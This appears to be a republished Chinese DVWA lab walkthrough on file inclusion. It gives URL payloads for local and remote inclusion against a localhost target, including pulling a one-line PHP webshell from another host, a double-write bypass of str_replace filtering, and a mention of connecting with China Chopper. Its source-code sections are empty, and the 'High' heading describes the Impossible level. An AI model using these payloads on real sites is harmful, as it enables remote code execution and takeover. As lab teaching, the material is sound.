DVWA之File Inclusion(文件包含)

您所在的位置:网站首页 简要说明文件包含漏洞的成因是什么意思 DVWA之File Inclusion(文件包含)

DVWA之File Inclusion(文件包含)

2023-06-10 17:30| 来源: 网络整理| 查看: 265

目录

​​LOW:​​

​​Medium:​​

​​High​​

​​Impossible​​

LOW:

源代码:

可以看到,low级别的代码对包含的文件没有进行任何的过滤!这导致我们可以进行包含任意的文件。

当我们包含一个不存在的文件 haha.php ,看看会发生什么情况!

​​http://127.0.0.1/vulnerabilities/fi/?page=haha.php​​

可以看到,发生了报错,并且把网站的路径都给暴露出来了。

DVWA之File Inclusion(文件包含)_php

第一行的那个Warning就是找不到我们指定的haha.php文件,也就是包含不到我们指定的文件,所以Warning。 而第二行的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。 

我们可以试下是否存在远端包含,在云端搭了一个一句话木马,然后包含该文件看看:

​​http://127.0.0.1/vulnerabilities/fi/?page=http://192.168.10.139/xie.php​​

结果发现成功包含了远端的文件。

那么我们就可以利用中国菜刀进行连接了。

DVWA之File Inclusion(文件包含)_文件包含_02

Medium:

源代码:

可以看到,代码使用 str_replace函数 对http:// 和 https://进行了过滤,防止了远程包含漏洞的产生,也过滤了 ../ 和 ..\ 防止了进行目录切换的包含。

但是使用 str_replace 函数进行过滤是很不安全的,因为可以使用双写绕过。例如,我们包含 hthttp://tp://xx 时,str_replace 函数只会过滤一个 http://  ,所以最终还是会包含到 http://xx 

所以,我们可以试试访问该链接 ​​http://127.0.0.1/vulnerabilities/fi/?page=hthttp://tp://192.168.10.139/xie.php​​

结果成功包含了远端的文件,所以我们就可以用一句话木马连接了。

相关文章:​​DVWA文件上传漏洞High级别​​

High

源代码:

可以看到,impossible级别的代码使用了白名单过滤的方法,包含的文件名只能等于白名单中的文件,所以避免了文件包含漏洞的产生!



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3